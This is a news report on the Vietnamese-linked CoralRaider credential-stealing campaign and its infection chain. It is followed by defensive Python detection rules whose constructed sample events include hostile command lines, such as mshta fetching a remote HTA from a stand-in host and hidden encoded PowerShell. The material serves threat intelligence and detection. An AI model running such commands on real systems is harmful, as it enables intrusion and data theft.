9 April 2024

CoralRaider cybercrime gang hunting for credentials and financial data


A new financially motivated threat actor believed to be of Vietnamese origin is targeting victims across various Asian and Southeast Asian countries to steal credentials, financial data, and social media accounts, including business and advertisement accounts.

Dubbed “CoralRaider,” the threat actor has been active since at least 2023, according to Cisco’s Talos threat intelligence team. The malicious campaign, spotted by the researchers, is focused on multiple countries in Asia and Southeast Asia, including India, China, South Korea, Bangladesh, Pakistan, Indonesia and Vietnam.

The group employs sophisticated techniques and utilizes specific tools such as RotBot, a customized variant of QuasarRAT, and the XClient stealer as payloads in their campaigns.

CoralRaider’s tactics also include the dead drop technique, which abuses legitimate services to host configuration files, and the use of uncommon living-off-the-land binaries (LoLBins) such as Windows Forfiles.exe and FoDHelper.exe. These techniques help the threat actor evade detection and complicate mitigation efforts.

Based on the group’s Telegram command-and-control (C2) bot channels, language preferences, and the presence of Vietnamese words hardcoded in their payload binaries, Talos believes that the CoralRaider operators are based in Vietnam.

Further investigation into CoralRaider's operations revealed their involvement in underground markets facilitated through Vietnamese-language Telegram groups that serve as platforms for trading victim data and other illicit activities.

The attack starts with a malicious Windows shortcut file, which downloads and executes an HTML application file (HTA) from an attacker-controlled server. Subsequently, a sequence of obfuscated Visual Basic and PowerShell scripts is executed, leading to the deployment of RotBot and XClient onto the victim's system.

Upon execution, RotBot conducts detection evasion checks and system reconnaissance before connecting to a legitimate domain controlled by the threat actor to download the configuration file for C2 communication, primarily conducted through Telegram bots.

Once connected to the Telegram C2 bot, RotBot loads the XClient stealer payload into the victim's memory, initiating a series of actions aimed at collecting sensitive information from the victim's browser, social media accounts, and applications such as Telegram and Discord. Screenshots of the victim's desktop are captured and exfiltrated along with collected data to the attacker's Telegram bot.
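As an added illustration (not part of the original article or of Talos's research), the following Python detection logic flags the execution chain described above, namely a shortcut-launched mshta.exe fetching a remote HTA, script hosts chaining into hidden or encoded PowerShell, and the uncommon LoLBins Forfiles.exe and FoDHelper.exe, over constructed Sysmon-style process-creation events. The field names, file paths and URL in the sample events are constructed for this example, not taken from the campaign.

```python
"""Flag CoralRaider-style process chains in constructed process-creation events."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent: str   # parent image path (Sysmon Event ID 1 "ParentImage")
    image: str    # image path ("Image")
    cmdline: str  # full command line ("CommandLine")


SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe"}


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return the detection tags that apply to a single event (empty if benign)."""
    par, img, cl = basename(ev.parent), basename(ev.image), ev.cmdline.lower()
    findings = []
    # 1. mshta.exe launched with a remote URL: the HTA-download stage of the chain
    if img == "mshta.exe" and re.search(r"https?://", cl):
        findings.append("mshta_remote_hta")
    # 2. mshta.exe handing off to another script host (HTA -> VBS stage)
    if par == "mshta.exe" and img in SCRIPT_HOSTS:
        findings.append("mshta_spawns_script_host")
    # 3. script host launching hidden/encoded PowerShell (VBS -> PowerShell stage)
    if par in {"wscript.exe", "cscript.exe", "mshta.exe"} and img == "powershell.exe" \
            and re.search(r"-(e|enc|encodedcommand)\b|hidden", cl):
        findings.append("script_host_to_powershell")
    # 4. forfiles.exe with /c: the LoLBin runs an arbitrary command per matched file
    if img == "forfiles.exe" and "/c" in cl:
        findings.append("forfiles_proxy_exec")
    # 5. fodhelper.exe spawning a script host; assumption: it has no normal reason to
    if par == "fodhelper.exe" and img in SCRIPT_HOSTS:
        findings.append("fodhelper_child_script_host")
    return findings


def scan(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index -> findings for every event that triggered at least one rule."""
    return {i: f for i, ev in enumerate(events) if (f := classify(ev))}


# Constructed sample events (hostnames and paths are placeholders, not real IoCs).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              r"mshta.exe http://stager.example.invalid/index.hta"),
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\wscript.exe",
              r"wscript.exe C:\Users\Public\stage.vbs"),
    ProcEvent(r"C:\Windows\System32\wscript.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -w hidden -enc QQBBAEEA"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\forfiles.exe",
              r'forfiles /p C:\Windows /m notepad.exe /c "cmd /c echo @path"'),
    ProcEvent(r"C:\Windows\System32\fodhelper.exe", r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c C:\Users\Public\run.bat"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
              r"notepad.exe readme.txt"),  # benign control event
]
```

Running `scan(SAMPLE_EVENTS)` flags the first five events and leaves the benign notepad.exe launch untouched; in production the rules would be fed from an EDR or Sysmon pipeline rather than a static list.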
